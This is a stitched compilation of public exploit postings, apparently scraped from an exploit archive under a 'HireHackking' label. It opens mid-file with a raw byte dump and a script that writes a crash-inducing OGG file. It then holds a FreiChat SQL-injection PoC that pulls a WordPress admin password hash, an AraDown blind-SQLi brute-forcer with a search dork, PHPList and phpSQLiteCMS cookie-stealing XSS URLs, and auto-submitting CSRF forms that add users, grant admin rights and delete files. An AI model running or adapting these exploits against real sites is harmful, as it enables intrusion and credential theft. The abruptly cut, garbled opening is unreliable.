\x96\xDA\xC5\xB7\x9D\x8A\x51\x6F\xCC\xD5\x7E\x53\xB9\xEA\xD9\x77\x7C\x7B\xCF\x13\xD1\xB7\xC8\x77\x8F\x14\x43\x45\x9F\x85\x7B\xAA\xA8\x21\xFA\xA4\xCF\xE6\x0D\xF3\xB2\xE8\x4D\x13\x41\x00\xFE\xCB\x95\xC2\x45\xCD\xBF\x06\xB1\xFD\x32\x24\x8A\x1C\xCC\x65\x3A\x05\xF9\x9F\x01\x1C\x24\x8A\xAD\xF5\xBE\x6F\xC2\xB1\xCF\xAD\xF6\x59\xAD\xB2\xD1\xC9\x00\x00\x00\x00\x00\x69\x25\x8D\x17\x57\x5F\x87\xAF\x65\x6B\x46\x39\xE4\xDC\xAF\x72\xA7\x6B\x27\x21\x75\xD3\xF2\x96\x07\x13\xBD\xBB\x1D\xCE\xE7\xA1\xF1\x8A\x1F\xD9\x8E\x3D\xAF\x18\x8F\xA7\xC5\xE9\xCD\x39\x71\xBA\x96\x35\x07\x3B\x3D\x6F\xB9\xBB\x5E\x2C\x4E\x13\x71\xEE\x9D\x77\x93\xFE\xD7\x7B\x73\x42\xF4\xAF\x1A\x7E\x30\x13\x27\xF3\xFF\x88\x4B\xEA\xF1\x96\xF0\x39\x59\x05\xB7\xB6\xC9\x7D\xFE\xF1\x9C\x33\x6A\x82\xE6\xE4\x27\x34\x59\x49\x81\x2C\x98\xFD\x12\xA1\xDD\xD5\x79\xCC\x2E\x6B\x2A\x2B\x76\x1C\x23\x85\x50\x2F\xD9\xF4\xDD\xA7\x5F\xAD\x8D\x3A\xA2\xF8\xDA\x23\x58\x6B\x2E\x7C\xB8\xCA\xFB\xA5\x4D\xBA\x86\x6B\x77\x7D\xEC\xAF\x4F\xB3\x87\x83\x73\x38\xBD\x94\xAF\xD5\xB9\xF9\xB6\x71\xDD\x1B\x28\x60\xDC\x67\x47\xCC\xED\xC1\x24\x64\xAF\xD1\xCE\xC3\x94\x00\x6A\x1E\x3A\xA7\xA8\xD6\x7C\xCD\xE6\x70\x32\x67\x09\xFE\xFD\x52\xE7\x4E\xB5\xC8\xE2\x64\x51\x71\x4F\x56\xE2\x5D\xF3\xE2\x56\x77\xDB\x68\xB4\x0C\x32\x17\x91\x16\xB3\x75\x5F\xF4\xDE\x00\x1A\x2F\x77\xA6\xD3\x9F\x9F\x52\xEC\x25\xA3\xD3\x23\xE3\x0B\xD6\x8D\x64\xC2\x50\xA1\x43\x85\xA1\xDE\x84\x1C\x18\xD9\x16\x38\x00\x36\x9A\x0D\x40\x0E\xE6\x3F\x03\x92\x1B\xC9\xFA\x3A\xB5\x45\x44\x0D\xE6\x3F\x07\xC2\x44\xAA\xFD\x67\x1D\x79\xD1\xFA\x63\x4D\x62\x76\xF3\xF2\xD1\x38\x1C\x67\x77\x5B\x37\x4F\x9E\x71\x61\xCC\xC7\xCE\x8C\x58\xCE\xE7\x43\xC2\xDE\xB6\x59\xA3\xE5\xCA\x34\x3D\x17\x00\x00\x00\x00\x00\xA6\x0D\x6E\x36\xFA\xCF\xAC\x72\x63\x0F\xBA\xDB\xCE\x33\xB5\x5A\xCE\x3F\x99\x57\x7B\xA8\xBB\x38\x5F\x3A\xBC\x69\x9A\x93\x63\xEB\x6F\x59\x7C\x57\xBE\xF6\xAE\x97\xF6\xD7\xBF\x27\x1D\x79\x3C\x8C\xD2\x67\xD6\xF3\x35\xB8\xE0\xFE\xF1\x7A\xF1\xF5\xEA\x73\xEE\xF5\xFB\xD1\xEE\x5C\xE2\x93\xC7\x5D\x45\x9D\x5D\xD7\x8A\xB2\x81\xDD\x9B\x86\xDA\x4B\xD5\xD6\x00\xB5\x09\x8F\x2B\x4E\x7B\x20\x4B\x78\xAD\x35\xB9\xD5\xD3\xD5\xE7\x4B\x9B\x9E\xF3\x25\xAE\x47\xEA\xA8\xE0\xB1\xDF\x8F\x1A\x6D\x92\x8F\xB0\x3E\xFF\xC1\x8C\xE3\x6F\xA2\x08\x0A\x1F\xFC\x55\x1E\x0D\x5F\xD9\xAA\x8B\xCA\xCA\xCA\x4E\x9A\x66\xF3\x4B\x24\xE7\x26\x14\x63\x0D\x87\x81\xE7\x57\x7D\x55\xCF\x9D\x99\xD5\xF1\x35\x69\x2A\xEB\xF5\x7D\x4E\x36\x5D\x59\x2A\x86\x1A\xB6\x6A\x5D\x5B\xF0\x9A\x6C\x5B\xE7\xA3\xAA\xBD\x1C\x9F\x54\x0D\x1B\x20\xAD\x86\xDD\xEB\x7D\x9E\x2C\x24\xAA\x18\xB5\xC0\xE4\x93\xB9\xC9\x65\x22\x90\x29\x73\x4B\x8D\xBE\x2D\xA6\x23\x8B\x9D\xF0\xA6\xA4\xA6\x7D\x57\xA7\x7D\xBC\x5B\x08\x0B\x02\x6C\x49\x36\x72\xE8\x40\x86\x77\xCB\x7F\x0D\xFF\x2E\xBF\xCB\xB6\x90\x02\x51\x53\x0F\x15\xE3\xC9\x50\x41\x15\xB4\x72\x4B\x36\xE2\xA1\x46\xC7\x46\xBD\xB5\xDA\x94\x33\xA8\xED\x60\xF8\x01\xCC\x24\x20\x00\xB8\xDB\x07\x98\xED\xEF\xDB\x22\x81\xC3\xFE\xF2\xFC\xBA\x14\xFB\x1D\xCF\x06\xD7\xE3\xB8\xFC\x3D\x6F\xD0\xDE\xD0\x61\xFE\x1C\xAF\xB9\x72\xE3\xED\xC2\xA2\xB8\xF6\x6E\x5E\x1A\xF8\xF0\xB5\x61\xFC\xD1\x06\xDC\x8A\x05\x35\xE6\xA5\x26\x07\xA9\xE2\x52\x8E\xFF\x84\xBA\x6E\xFE\x00\xDB\x2C\xC8\xEC\x89\x01\xC0\x83\x25\xC0\xF4\xA5\xD3\x70\xFC\xDF\x9C\xB9\xEB\x85\x25\xCA\x3D\xF1\xE1\x8A\x6E\xEB\xEB\x2F\xFC\x64\x53\xC6\x7A\x36\xE5\x9B\xE7\xBD\xE9\x9C\x67\xF2\xF2\xB8\x79\x79\x70\x72\xEF\x75\xAE\x07\x69\x89\x6E\x7F\xF9\x51\xE5\xA4\xDF\x02\x00\xAC\x5E\x23\xBF\x41\xCE\xDD\x99\xDA\x8D\x3C\x9D\x87\xFA\xD6\xB1\x7D\xD7\xA7\x75\xDB\xAC\xE5\x04\xE9\xB0\x1B\xC7\x0D\x3C\x55\x6D\x67\xDF\x9A\x9F\xEF\xBF\x74\x36\x77\x23\x1F\xEB\xB5\xF7\xEA\x9D\x6A\xAE\x9B\x6F\xD5\xDD\xB7\x65\xAF\xF7\x97\x16\x23\xDF\xD4\xC3\xA5\x73\xFB\x1F\x14\x79\xFC\xE2\x95\xBF\xB0\xD7\xA8\xC1\x92\x65\x3B\xDB\x3D\x1F\xF3\x45\x00\xC4\x76\x75\x39\xCC\xD4\xF4\x20\xD4\x3B\xE0\x23\xA6\xD4\x24\xFC\x03\xAC\xFB\x82\x8A\xE7\xDB\x93\x00\xFD\x1A\xC0\xB0\xDE\x9B\x2F\x5C\x47\x3F\x3D\x8F\xF1\xFF\x86\x5D\x6E\xBE\x7E\x8D\x17\x5F\x99\xD7\xF2\x3A\x18\xAC\x63\xD2\xFD\x1D\x1C\x3B\x4B\xA9\xFE\xA2\x6A\x4F\x1E\xFF\x8C\xEE\xD6\x48\xAA\xA2\x47\xE7\xDF\xBC\x2C\xB8\xF5\xA4\x03\x9A\x9A\x0D\xE1\x1C\xF4\x3F\x07\xC5\x44\x12\x5E\x68\xB6\x00\x52\xE0\xBF\x01\x23\x4C\x24\x91\xFB\x03\x00\xE4\x6B\xF1\xE1\xEC\xD1\xD9\xEC\x26\xA2\xDF\x04\xE7\xC9\x49\x9E\x74\xCA\x03\xCC\xFD\x38\xF6\xAA\xA0\xA5\x1B\x9E\x8C\x31\x55\x19\x00\x00\xC6\x44\x12\x21\x22\x76\x1B\xDC\x9E\xBF\xD3\x47\x0D\x39\xE5\xE5\xEB\xB3\xB8\xF4\xF5\x4B\xBF\xD2\x99\xEE\xD3\x71\x8F\xA6\xE1\xB8\x3D\x1B\x0D\x4A\x69\x8A\x97\xB6\xEB\x82\xB1\x62\x17\x35\xBD\x99\x1B\xA0\x59\xD8\xB4\x96\x30\x5A\x83\xB3\x67\x88\xCE\xB5\xD3\xB9\x57\x35\x86\x46\x13\x9D\xED\xE8\x59\xBA\xEB\xBE\x5A\x5A\x74\xD2\xBF\x2F\x2B\x66\x2B\xCF\xF1\x7D\x41\x7C\xCE\x9B\xC6\x2F\xD5\x59\xB3\x85\x7A\x34\xA3\xFD\x9E\xD8\x1E\xE9\xB5\x8E\xC6\x76\x40\x3B\x1D\xAE\xC7\xE5\x25\xDF\x7E\xF6\x62\x5B\xE0\xA0\xA6\xBB\x67\x49\xA2\x7D\xA3\x8B\x0D\x30\xFF\xFB\xFE\x9B\x83\xEA\x99\x02\x4D\xD4\x26\x92\xBA\x78\xC9\x17\xAD\x79\xBF\x58\x50\xCE\x1C\x9B\x2E\xCF\x6B\x91\xA8\x17\xD7\xAB\x9A\xDE\xCC\x28\x93\x33\xEF\x8D\xA9\xBB\xDE\x4A\xBC\x75\x4A\xDE\x52\xE7\x49\x3F\x62\x26\xF8\xCC\x46\xB5\x49\xA0\xE1\xD7\x79\x89\x28\xFA\x12\x9B\xCE\x8D\x48\x98\x35\xBB\xF3\xFE\xEA\x9E\x36\x3D\x9B\xD9\xC9\x34\xD6\xDD\x0D\xB0\xBB\xA6\x99\x5C\x69\xD8\x7D\xC9\xDF\x19\x47\x20\x23\x61\xD9\x46\x16\xE8\x46\xC6\xD8\xC2\x13\x73\x8D\x6F\xF8\xFE\x76\x5A\xF8\xF9\x77\x77\xAD\x8B\x37\x73\x32\x95\xD5\x11\x38\x70\x7F\x60\xD9\x60\x1C\x5A\xC2\x0A\xE4\x3F\xC2\x96\x1D\xD0\x00\x0E\x98\x15\xC0\xF0\x1E\xC7\x82\xDE\x07\xD3\x85\x7C\x48\x2F\xF0\xC4\x31\xAD\xC4\xD1\x36\x40\x21\x08\x7E\xDB\x45\x20\x07\xF9\xAF\x81\xF2\x22\x59\x5B\xEF\x96\xC5\x18\xEC\xBF\x06\xC2\x46\x12\xFC\xBD\xFE\xB4\x57\x62\x2F\x7C\x03\x67\x94\xB0\xCF\x39\x6B\x6B\xA3\x32\x2D\x75\x61\x00\x00\x00\x00\x80\xC9\xFB\xD3\x63\x26\xEA\xE7\xC7\xB7\x5F\x5F\xA7\x06\x1B\x93\x7B\x0D\x87\xB3\x8D\xC9\x91\xB3\xDD\x5B\x75\x1D\xB7\x9B\x7E\x65\xA2\xDA\x3B\x48\x5A\x5E\x27\x9A\xB5\x95\x37\xBB\xAB\xF2\x97\xC7\x07\x85\x26\xE7\x68\xD5\x74\xCE\xC9\xB6\x4B\xE5\xF1\xBA\x0F\x44\x48\xB8\x27\xD4\xDD\xA9\x3C\xB2\xEE\x55\x4F\xDA\x6C\xFC\xCA\xDE\xCF\xB0\x32\x9F\x28\xD8\xE1\x97\xBF\xB4\x2B\xCF\x53\x35\xE7\x92\x1C\xBB\x39\xFA\xE5\xE5\xF8\x99\x07\xDC\x1B\x77\xBA\xA9\x0E\x89\xCE\xC2\xD9\xF7\x6F\xE7\xC1\x43\x47\x56\x9E\x99\x9D\x86\x86\x9F\x7A\xB4\x6F\xB9\x6F\x49\x40\x29\x87\xAB\xAF\x6E\x5A\xF5\x44\x53\x71\xF5\xF4\x94\xEF\xE6\xF9\x0F\x31\xE7\x7D\xE3\x55\xAA\xF1\xD8\x84\x76\x35\x67\x32\x6E\x4F\x96\x93\xA5\xCE\x8C\x47\x91\x14\x9F\x35\x7D\x0C\xEF\xC7\xD6\x90\xEC\x7A\xBD\x7B\x8C\x72\x98\xEE\xBB\x78\x3D\x4E\xD7\xCC\x54\xDD\xC5\x5E\x46\x9E\x8A\xFA\x2D\xB9\xE8\xE9\x5D\x95\xBD\x4D\xA8\x9D\x73\x66\x21\x2B\xD7\x76\xC2\x74\xB5\xF7\xDC\xBD\x9F\x29\x8E\x71\x63\xFF\x5B\x12\x9B\x76\x3D\x61\xF8\xB6\xBC\x35\x71\x34\x33\xBF\xFF\x35\x7F\xFE\x2C\x05\xB6\x04\x18\x02\xFF\x0B\xDF\xC2\xE0\x47\x96\x83\x50\x8A\x58\xC2\xD0\x37\xD3\x10\xC3\x14\x51\x15\x45\x01\x1E\x7C\xA5\xAE\x06\xF3\x9F\x05\xC2\x40\xAA\xFD\x6F\x56\x9A\x18\x93\xFD\xE7\x4C\x62\xD8\x48\xD6\xB7\xDA\xF4\x2C\xAC\x63\x8F\x4E\x37\x38\x3B\x55\x30\xDA\x9C\x35\x5A\x6E\x15\x23\xC7\xCE\x00\x00\x00\x00\x00\xE9\x98\x31\x45\xEF\x87\xEF\x67\xE5\xD9\x7A\x7B\xE5\x60\xBD\xB2\x79\x98\xCC\xE2\xEC\xEA\x6B\x97\xD9\xC5\xEA\x14\x2B\x4D\x87\x31\x7E\x30\x7B\xBC\xC7\xC5\xC2\x7E\x5A\x31\x7F\xFD\xB7\xE9\xD1\xA7\x2F\x35\x3C\x2E\xE8\x28\xA3\xAF\x33\x1F\x31\xDE\x38\x13\x3B\x7F\x82\xBE\x23\x9D\x3C\xBF\x08\x3A\xBF\x1E\x26\xA9\xDD\x7B\xD4\x0D\x3F\x1C\x3A\xEB\x86\xCA\xF2\x4D\x48\x71\xE7\xD2\xFE\x1F\x7B\xAC\x25\x55\x22\x97\xC6\xBF\xFB\xA1\x2B\x67\xE3\xEF\xCC\xAC\x2F\xBB\x2A\x35\xEA\xC2\xF8\xE5\xE9\xDE\x69\x7E\x9D\x70\xA2\xA2\x71\x57\xC2\x6C\xC2\xDF\xE2\xEB\x39\xC9\x87\xEC\xD2\x5E\x45\x1D\x53\x5F\xEE\xBF\x3C\x66\x1B\x83\xB5\x5D\x43\x41\xA9\xD9\xFB\x22\x7F\xBD\x70\x73\x25\xF4\xFA\xFE\xCA\xE8\x88\xED\x73\x2E\xB9\x9C\x64\xA7\xB3\x61\x89\x7B\xDF\x11\x44\x52\xDF\x7A\xDC\x92\xEC\x7C\xA2\x2B\x8F\x92\x5C\x9B\xCE\x21\x1F\xC8\xCC\x15\xEF\x53\xB0\x5B\xE5\x51\x5F\x18\x72\x0F\x89\x7F\x69\x59\x10\x58\x36\xF8\x58\x15\x11\x6D\x96\x8E\xDB\xEF\xCD\x38\xC6\xA7\xEF\xE7\xFE\x68\x61\x61\x26\x5E\x15\x11\x95\xC7\xA6\x29\x02\xA6\x8A\x20\x2A\xC6\x91\x88\xBE\x6D\x99\x68\xF8\x2F\xB0\x1C\x38\xB0\x6C\x09\x05\x00\xBE\xAB\x85\x2E\x47\xC8\xFF\x0C\x22\xED\x55\x91\x28\xF2\xAD\x16\x53\x17\xF8\xCF\x19\x30\x90\x78\xAB\x93\x33\x37\xFD\xFB\xB9\xDF\x25\x5C\x5A\x01\xDB\x9C\xFB\x29\xA0\xDC\x67\xAB\x24\x13\xD2\x77\x06\x00\x00\x00\x00\xD8\xC9\x3C\x93\x47\x63\xF7\x34\xFE\xCF\xCC\x36\xDE\xF0\x6B\xEF\xE1\x64\xC2\x28\x91\xE3\xC1\x69\x0E\xC5\x2B\x2D\x39\xB7\xAD\xEB\x6E\xB6\x66\x64\xD7\x2F\x96\xA7\xCB\x3A\xFD\xB5\xF3\xFD\xD5\x43\xF5\xB0\x8D\xBD\xA9\xFE\x31\xA3\xFB\xAF\x0E\xB4\x8A\x60\xC6\x5C\x1A\x5D\xC7\xC1\xDC\x72\x65\x22\x0B\x7C\xC4\xDE\x77\x96\x9F\xAD\xC9\xD3\x33\xDB\xF9\x1F\x3D\x8F\x9C\x49\xA7\xE7\xF5\xBB\x15\xCF\xBB\x93\xF3\x2C\x6D\xF3\x6F\x8C\x35\x97\xFC\x85\xFB\xCE\x1C\xAE\xE1\x92\xD4\xE3\xF1\x3B\x6C\xAC\xD9\xB3\xC2\xDD\xDD\x25\x4E\x37\x8B\xC4\x38\x86\xFB\xBE\xEF\x6B\xEB\x83\x59\xEF\xF9\x15\xE8\x61\xAA\x9A\x66\xB7\x5E\xB6\x2A\xC9\x5E\xFC\x29\x31\x4D\x49\x6F\x9F\x48\xA8\x74\x1D\xE5\xE4\xEB\x3F\x97\x23\xB8\x17\x6C\x7E\xCA\x3F\x5C\xAA\xA4\xA7\x3C\x96\xBD\xF8\xFE\x74\x7F\xF0\xB7\xA9\x3D\x6D\x4D\xEF\x7D\xFF\x5C\x75\x8C\x2E\x7B\x36\x61\xB5\x30\x50\x11\xF0\xCB\x14\x64\x2D\x59\x3D\x9C\xA1\x7E\xEE\x1E\xCF\x90\x39\x4F\x6B\xD3\x1A\x26\x2B\xAC\xF6\x16\x2A\x26\x7A\xF3\xB6\xF5\xCD\x4B\xB0\x6F\x4E\x4B\x56\xEC\x3F\x72\x88\x25\x00\x59\x92\xC1\x96\xF4\x81\xE5\x2D\xD3\xDB\x67\x4B\x72\x53\x55\xCC\xDF\x31\xC4\xB0\xD7\x7B\x72\x33\xD4\x5F\xE4\xF0\xAF\xCF\x0E\x6D\x49\x78\x00\xBE\xAB\x85\x22\x46\xFD\xBF\x41\xC6\x56\x99\x53\xED\x67\xB5\x24\x4C\x71\xFD\x6F\x00\x03\xA9\xFE\x97\xC1\xB0\x76\x02\xA3\x8E\xD4\x29\xA0\xDA\x53\xAD\x72\x34\x7C\x30\x00\x8C\x30\x00\x00\x20\x72\x31\x5C\xFB\x63\x1B\xE5\xA9\x53\xFB\x75\x73\x54\x97\xDD\x6D\xB7\x36\x39\x36\xF5\x0B\xF1\xAE\x04\x0A\xDE\xF4\x91\x78\xC9\x51\xAF\xF1\x13\x6B\xF2\x95\x0F\xDB\x7B\x9F\x8C\xFD\xDF\x79\xF9\xE7\x0F\x07\xD9\x94\xCD\xEB\x94\xBA\xFD\xC7\xE4\xBA\xF6\xE7\xC1\x3C\x72\xAF\x8F\x8B\x33\x1E\x74\x72\x8B\x6C\xC5\x0F\x5D\xED\x93\x12\x1A\xFE\x77\xFF\xFB\xEA\xE4\xFD\x6D\x57\x33\xA6\x39\xD4\xA7\xC1\x65\x65\x73\xE5\x7F\x89\xCD\x66\x53\x03\xFB\x67\x15\x73\x95\x48\xF7\xA6\xE7\x79\x3A\xDD\x1C\x2D\xC7\xCF\x3C\xCE\xF1\xCC\xCC\xA9\xC7\xB9\x23\x1D\x39\x7C\x43\x64\xA9\x9B\x60\xA1\x7D\xF5\x4B\xC6\xDB\x05\x8C\xFC\xA5\xAC\x7B\x3C\x7D\xBE\xBE\xC9\x5B\x91\x71\xB3\x24\xBB\x8D\xEF\x3C\xEA\xDD\x47\x9E\xC8\xC9\x30\xF0\x9B\xA3\xBD\x16\x91\x48\xA2\x42\x4C\x6F\x42\xF5\x99\xCA\xA2\x12\xBA\xEE\xAE\x7D\x5E\x53\x9F\xF5\x01\x93\xC3\xE0\xEB\xA0\x15\x98\x33\x6A\xDD\x4F\x67\x67\x53\x00\x01\x00\x55\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x04\x00\x00\x00\x16\x3D\x35\xFD\x28\x46\xFF\x4C\xFF\x52\xFF\x4E\xFF\x6A\xFF\x53\x46\x51\x54\x53\x56\x52\x51\x58\x51\x52\x48\x44\x56\x54\x56\x56\x53\x58\x53\x51\x51\x56\x52\x57\x57\x55\x52\x57\x54\x3B\x0B\x66\x98\xFB\xBD\xAF\x64\x85\xD6\x55\x54\xFE\x7B\x37\xE0\x9C\x80\xCF\x62\x57\xBC\x6B\x61\xB2\xCC\xFF\xCA\xD2\x2F\x63\xD7\x28\x5C\x9E\xC7\x77\xA1\xDA\xBC\x9F\xFD\x42\x13\x9B\xA7\xA1\xA6\xAA\xA2\xE6\x49\xC5\x14\x11\x51\xC1\x90\xEF\x31\xB8\xFB\x58\x50\x70\x00\x10\x48\x00\x02\x3E\xCC\x65\xB1\x06\xFD\xCF\x81\x74\x33\x24\x0D") 
filename = "crash.ogg"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()
HireHackking

FreiChat 9.6 - SQL Injection 

/*
# Exploit Title: FreiChat 9.6 SQL Injection
# Date: 27-11-2014
# Software Link: http://codologic.com/page/freichat-free-php-chat-script-software
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description
  
$_GET['time'] is not escaped.

File: freichat\server\plugins\chatroom\chatroom.php

$get_mesg = $this->get_messages($_GET['time']);
public function get_messages($time) {

    $frm_id = $this->frm_id;
    $result = array();

    if ($time == 0) {
		//$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time";
    } else {
        $get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time ";
        $result = $this->db->query($get_mesg_query)->fetchAll();
    }


    return $result;
}

http://security.szurek.pl/freichat-96-sql-injection.html

2. Proof of Concept

Example for WordPress integration (it will give you admin password):
*/

<?php
/*
 * Kacper Szurek
 * http://security.szurek.pl
 */
function hack($url, $cookie, $sql ){

$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$content = curl_exec($ch);

if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) {
    curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]);
    $content = curl_exec($ch);

    curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql));

    $content = curl_exec($ch);

    if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) {
        echo "WordPress password user ID=1: ".$output[1];
    } else {
        echo "FAIL";
    }
}

curl_close( $ch );
}

// URL to WordPress main URL
$url = "http://wp/";

// SQL Payload
$sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- ";

$cookie = "/cookie.txt";

hack($url, $cookie, $sql);
HireHackking 
source: https://www.securityfocus.com/bid/54887/info

PHPList is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PHPList 2.10.18 is vulnerable; other versions may also be affected.

http://www.example.com/admin/?page=user&find=1&unconfirmed=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
HireHackking 
source: https://www.securityfocus.com/bid/54881/info

The ConcourseSuite is prone to a cross-site request-forgery vulnerability and multiple cross-site scripting vulnerabilities.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete, or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.

ConcourseSuite version 6.1 (20120209) is vulnerable; other versions may also be affected. 

http://www.example.com/crm/Sales.do?nameFirst&nameLast
http://www.example.com/crm/ExternalContacts.do?nameFirst&nameLast&company
http://www.example.com/crm/Accounts.do?name
http://www.example.com/crm/MyCFSProfile.do?address1state
HireHackking

AraDown - 'id' SQL Injection 

source: https://www.securityfocus.com/bid/54891/info

AraDown is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

<?php
echo "
                 _____   _    _   _____   _____  _______
                /  ___| | |  | | /  _  \ /  ___/|__   __|
                | |  _  | |__| | | | | | | |___    | |
                | | | | |  __  | | | | | \___  \   | |
                | |_| | | |  | | | |_| |  ___| |   | |
                \_____/ |_|  |_| \_____/ /_____/   |_|
             ____    _       _____   _____   _____  ___    ___
            |  _ \  | |     /  _  \ /  _  \ |  _  \ \  \  /  /
            | |_) | | |     | | | | | | | | | | |  \ \  \/  /
            |  _ (  | |     | | | | | | | | | | |  |  \    /
            | |_) | | |___  | |_| | | |_| | | |_|  /   |  |
            |____/  |_____| \_____/ \_____/ |_____/    |__|
 
[*]-----------------------------------------------------------------------[*]
    # Exploit Title  : ArDown (All Version) <- Remote Blind SQL Injection
    # Google Dork    : 'powered by AraDown'
    # Date           : 08/07/2012
    # Exploit Author : G-B
    # Email          : g22b@hotmail.com
    # Software Link  : http://aradown.info/
    # Version        : All Version
[*]-----------------------------------------------------------------------[*]
 
[*] Target -> ";
 
$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
 
echo "[*] Username : ";
 
for($i=1;$i<=30;$i++){
    foreach($ar as $char){
        $b = send('http://server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
        if(eregi('<span class="on_img" align="center"></span>',$b) && $char == 'z'){
            $i = 50;
            break;
        }
        if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
        echo $char;
        break;
    }
}
 
echo "\n[*] Password : ";
 
for($i=1;$i<=32;$i++){
    foreach($ar as $char){
        $b = send('http://server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
        if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
        echo $char;
        break;
    }
}
 
function send($target,$query){
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
    curl_setopt($ch,CURLOPT_POST,true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    $r = curl_exec($ch);
    curl_close($ch);
    return $r;
}
function stdin(){
    $fp = fopen("php://stdin","r");
    $line = trim(fgets($fp));
    fclose($fp);
    return $line;
}
?>
HireHackking 
# Exploit Title:  CSRF, Unrestricted File Upload, Privilege escalation & XSS
# Google Dork: intitle: CSRF, Unrestricted File Upload, Privilege
escalation & XSS
# Date: 2015-07-12
# Exploit Author:  John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: phpsqlitecms.net
# Software Link: phpsqlitecms.net/download
# Version: ilosuna-phpsqlitecms-d9b8219
# Tested on: windows 7 SP1
# Category: Web apps CMS

Vendor:
================================
phpsqlitecms.net



Product:
================================
ilosuna-phpsqlitecms-d9b8219


Advisory Information:
==============================================================================
CSRF, Unrestricted File type upload, Privilege escalation & XSS
Vulnerabilities.
User will be affected if they visit a malicious website or click any
infected link.
Possibly resulting in malicious attackers taking control of the Admin / CMS
area.


Vulnerability Details:
=====================

CSRF:
-----
We can add arbitrary users to the system, delete arbitrary web server files
and escalate privileges, as no CSRF token is present.

Add arbitrary user:
-------------------
The following request variables are all that is needed to add users to
system.
mode = users
new_user_submitted = true
name = "hyp3rlinx"
pw = "12345"
pw_r = "12345"


Privilege escalation:
---------------------
Under users area in admin we can easily gain admin privileges, again using
CSRF vulnerability we
submit form using our id and change request variable to type '1' granting
us admin privileges.

e.g.

mode:users
edit_user_submitted:true
id:3
name:hyp3rlinx
new_pw:
new_pw_r:
type:1   <------make us admin


Delete arbitrary files:
------------------------
The following request parameters are all we is need to delete files from
media or files directorys
under the web servers CMS area.

mode=filemanager
directory=files
delete=index.html
confirmed=true


XSS:
-----
We can steal PHP session cookie via XSS vulnerability


Unrestricted File Type Upload:
------------------------------
The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts
when selected will execute
whatever PHP script we upload.


Exploit code(s):
===============

1- CSRF POC Add arbitrary users to the system.
---------------------------------------------

<script>
function doit(){
var e=document.getElementById('evil')
e.submit()
}
</script>
</head>

<body onLoad="doit()">
<form id="evil" action="
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php"
method="post">
<input type="text" name="mode" value="users"/>
<input type="text" name="new_user_submitted" value="true"/>
<input type="text" name="name" value="hyp3rlinx" />
<input type="text" name="pw" value="abc123" />
<input type="text" name="pw_r" value="abc123" />
</form>


2- CSRF privilege escalation POST URL:
--------------------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php


Privilege escalation request string:
------------------------------------
mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1


3- CSRF Delete Aribitary Server Files:
--------------------------------------
Below request URL will delete the index.html file in files dir on web
server without any type
of request validation CSRF token etc.


http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager
&directory=files&delete=index.html&confirmed=true


XSS steal PHP session ID POC:
-----------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&
edit=49&comment_id="/><script>alert('XSS by hyp3rlinx
'%2bdocument.cookie)</script>&page=1


Disclosure Timeline:
=========================================================


Vendor Notification:  NA
July 12, 2015  : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):             [+] POST & GET


Vulnerable Product:              [+] ilosuna-phpsqlitecms-d9b8219


Vulnerable Parameter(s):      [+] comment_id, delete, type,
new_user_submitted


